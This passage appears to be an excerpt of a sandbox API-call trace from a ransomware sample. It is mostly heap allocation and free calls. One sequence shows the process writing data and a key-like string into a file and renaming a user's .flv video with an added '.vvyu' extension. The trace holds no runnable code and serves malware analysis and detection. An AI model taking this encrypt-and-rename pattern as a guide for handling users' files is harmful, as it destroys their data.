(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0d0a0 [0196.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cf20 | out: hHeap=0x6a0000) returned 1 [0196.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.502] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0x8de7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0x8de7, lpOverlapped=0x0) returned 1 [0196.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.503] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x8dec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.503] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.504] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.505] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.505] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.505] CloseHandle (hObject=0x52c) returned 1 [0196.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0196.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d3a670 [0196.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0196.507] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\wlEnhA.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\wlenha.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\wlEnhA.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\wlenha.flv.vvyu")) returned 1 [0196.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.512] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.515] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8535e80, ftCreationTime.dwHighDateTime=0x1d898b7, ftLastAccessTime.dwLowDateTime=0xac17aea0, ftLastAccessTime.dwHighDateTime=0x1d8a58b, ftLastWriteTime.dwLowDateTime=0xac17aea0, ftLastWriteTime.dwHighDateTime=0x1d8a58b, nFileSizeHigh=0x0, nFileSizeLow=0x8dec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wlEnhA.flv", cAlternateFileName="")) returned 0 [0196.516] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0196.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0196.517] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0196.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0196.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47828 | out: hHeap=0x6a0000) returned 1 [0196.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0196.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0196.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0196.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d478c0 | out: hHeap=0x6a0000) returned 1 [0196.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47a88 | out: hHeap=0x6a0000) returned 1 [0196.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be43c0 | out: hHeap=0x6a0000) returned 1 [0196.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0196.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0196.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47a88 [0196.524] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0196.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 